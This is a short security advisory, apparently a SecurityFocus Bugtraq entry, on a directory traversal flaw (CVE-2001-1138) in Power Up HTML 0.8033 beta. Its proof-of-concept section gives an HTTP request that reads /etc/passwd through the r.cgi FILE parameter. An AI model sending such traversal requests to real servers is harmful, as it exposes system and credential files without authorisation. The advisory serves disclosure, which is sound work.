Power Up HTML Directory Traversal Arbitrary File Disclosure Vulnerability
BID:3304
Info
Power Up HTML Directory Traversal Arbitrary File Disclosure Vulnerability
| Bugtraq ID: | 3304 |
| Class: | Input Validation Error |
| CVE: |
CVE-2001-1138 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 07 2001 12:00AM |
| Updated: | Jul 11 2009 07:56AM |
| Credit: | This vulnerability was reported to Bugtraq by Steve Shepherd <[email protected]>. |
| Vulnerable: |
Randy Parker Power Up HTML 0.8033 beta |
| Not Vulnerable: | |
Exploit / POC
Power Up HTML Directory Traversal Arbitrary File Disclosure Vulnerability
An example of a HTTP request to exploit this vulnerability is:
http://www.target.com/cgi-bin/powerup/r.cgi?FILE=../../../../../etc/passwd
An example of a HTTP request to exploit this vulnerability is:
http://www.target.com/cgi-bin/powerup/r.cgi?FILE=../../../../../etc/passwd
Solution / Fix
Power Up HTML Directory Traversal Arbitrary File Disclosure Vulnerability
Solution:
Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.